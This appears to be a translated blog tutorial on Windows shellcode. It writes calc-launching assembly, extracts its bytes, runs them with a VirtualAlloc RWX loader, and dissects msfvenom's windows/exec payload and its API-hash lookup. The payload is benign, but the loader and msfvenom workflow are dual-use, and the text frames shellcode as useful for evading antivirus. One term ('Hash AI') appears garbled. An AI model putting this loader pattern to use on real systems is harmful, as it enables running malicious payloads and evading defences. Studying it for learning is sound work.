0x02 Write a simple shellcode

0 24
When I first started in the industry, I saw all sorts of shellcode flying around...

When I first started in the industry, I saw all sorts of shellcode flying around. Looking at these binary codes and also at the Neo poster of The Matrix on the wall, my heart gradually yearned for it. Shellcode is quite flexible and is often used in anti-anti-virus and vulnerability exploitation. So, how do we extract and load a shellcode, and how does msf implement shellcode?
image.png

0x01 Shellcode Basics

Shellcode is hexadecimal machine code. Below, we will further understand what shellcode is by looking at a simple code that opens the calculator Calc.exe.

0x02 Write a simple shellcode
#include "stdafx.h"          
#include                    
         
int main(int argc, char* argv[])          
{          
  WinExec("calc",1);          
  return 0;          
}

A particularly simple code, calling the Windows API WinExec to open the calculator, and then we will see it in OD dynamic debugging.
image.png

push 0x1 ; In x86, parameters are passed by pushing values onto the stack, pushing 1 onto the stack, which is the parameter 1 in WinExec("calc",1)          
push OpenCalc.00406030 ; Push the address storing the 'calc' string onto the stack, which is also a parameter          
call dword ptr ds:[<&KERNEL32.WinExec>] ; Call WinExec under KERNEL32

Brings up the problem

We will underline the machine code of these three sentences, and express it in C language as "\x6A\x01\x68\x30\x60\x40\x00\xFF\x15\x00\x50\x40\x00", which is also the shellcode string I often see. If we load this string into memory, can it run successfully, I'm afraid not, because we cannot guarantee that the address 0x406030 of every program stores the calc string, nor can we guarantee that 0x405000 in the import table is the WinExec address.

0x02 Write a simple shellcode

Then, the little Ming who has many questions will ask, if we pass the calc string directly and write a fixed WinExec address, can it run on the host in the current environment? Let's try, let's try.

Firstly, construct a calc string

xor  ecx, ecx              ; Set ecx to zero          
         
push ecx                   ; Push the value of ecx onto the stack, acting as the string terminator \x00          
         
push 0x636c6163            ; clac (calc little-endian)          
         
mov  eax, esp              ; Save the stack top pointer pointing to calc\x00 to eax

**Get Kernel32 WinExec Address**

There are two methods to obtain the address, one is through dynamic debugging, and the other is through GetProcAddress.

Method one:
image.png
Select or right-click and follow the data window to obtain the WinExec address.
image.png
Method two:

#include "stdafx.h"
#include <windows.h>

typedef int (__cdecl *MYPROC)(LPTSTR);

int main() {
  HINSTANCE Kernel32Addr;
  MYPROC WinExecAddr;

  Kernel32Addr = GetModuleHandle("kernel32.dll");
  printf("KERNEL32 address in memory: 0x%08p\n", Kernel32Addr);

  WinExecAddr = (MYPROC)GetProcAddress(Kernel32Addr, "WinExec");

  printf("WinExec address in memory is: 0x%08p\n", WinExecAddr );
  getchar();  
  return 0;
}

image.png
Construct the complete assembly code

section .data

section .bss

section .text
  global _start

_start:
  xor  ecx, ecx              ; Set ecx to zero
  push ecx                   ; Push the value of ecx onto the stack, acting as the string terminator \x00
  push 0x636c6163            ; clac (calc little-endian)
  mov  eax, esp              ; Save the stack top pointer pointing to calc\x00 to eax
  
  inc  ecx              ; Set ecx to 1
  push ecx              ; Push the second parameter 1
  push eax              ; Push the stack, eax points to calc\x00
  mov  ebx, 0x7c86250d  ; Save the address of WinExec to ebx
  call ebx              ; Execute WinExec

Save the above file as xxx.asm, if Windows does not have a compilation environment, you can directly compile it on Kali, the command is as follows

nasm -f elf32 -o xxx.o xxx.asm
ld -m elf_i386 -o xxx xxx.o

Then read the file through objdump -d xxx and print it in C format, the command is as follows

objdump -M intel -d xxx | grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

In this way, we smoothly obtain our shellcode
image.png
Load the shellcode

#include "stdafx.h"
#include <windows.h>

unsigned char shellcode[] = 
"\x31\xc9\x51\x68\x63\x61\x6c\x63\x89\xe0\x41\x51\x50\xbb\x0d\x25\x86\x7c\xff\xd3\x59";


int main(int argc, char* argv[])
{
  // Save the shellcode to memory for loading
  void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  memcpy(exec, shellcode, sizeof shellcode);
  ((void(*)())exec)();
  return 0;
}

Compile and run.
image.png
Successfully popped the calculator, proving that Xiao Ming's conjecture is feasible. Then, with many questions in mind, Xiao Ming asked, 'What use is there in this hardcoded address, which can only operate on itself?' Let's take a look at how msf's shellcode implements functionality on different machines.

0x03 Analyze msf's shellcode

We analyze the msf shellcode from a reverse engineering perspective, first we output the shellcode with the same functionality as the previous text using an msfvenom command.

msfvenom -p windows/exec cmd=calc.exe -f c
Compile our loader and perform reverse engineering on it.

#include "stdafx.h"
#include <windows.h>

// msf shellcode 
unsigned char shellcode[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

int main(int argc, char* argv[])
{
  void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  memcpy(exec, shellcode, sizeof shellcode);
  ((void(*)())exec)();
  return 0;
}

The author uses OD debugging to report errors and switches to windbg for dynamic debugging.

0x401000 is the main function (the initial address of the code segment), where we load the code, allocate memory space through virtualAlloc, and place the memory address in eax, which is 0x003A0000. Through memcpy, the shellcode variable stored in the .data segment is placed at 0x003A0000, and then called.

image.png
Let's take a look inside and find that the shellcode has already been copied into memory, and our shellcode can run normally. I have commented on the function of each assembly step.

image.png

The general process can be decomposed into:

1. Obtain the string 'calc.exe' at the end of the shellcode by using the hardcoded offset 0x82, then push parameter 1 and calc.exe onto the stack, as well as the winexec API hash 876F8B31

2. Loop through the PEB table to get the base address of the module

3. Parse the PE file, skip if there is no export table, and continue with step 2

4. Parse the export table, skip if the number of export tables is 0, and continue with step 2

5. Traverse the export name table to calculate the hash based on the export names, and find the corresponding function, which is WinExec

6. If the function cannot be found, find the next module information through the linked list and continue with step 2

7. Find winExec and execute the function

What is particularly interesting inside is the use of an API hash to find function addresses, a technology called SFHA (Stephen Fewer's Hash AI), which was the subject of a special lecture at DEFCON in 2017.

0x04 Summary

The road to the mountain of books is paved with diligence, and the sea of learning has no end but is navigated by hard work as a boat. It still requires a lot of code debugging to deepen understanding.

你可能想看:
最后修改时间:
admin
上一篇 2025年03月25日 03:17
下一篇 2025年03月25日 03:39

评论已关闭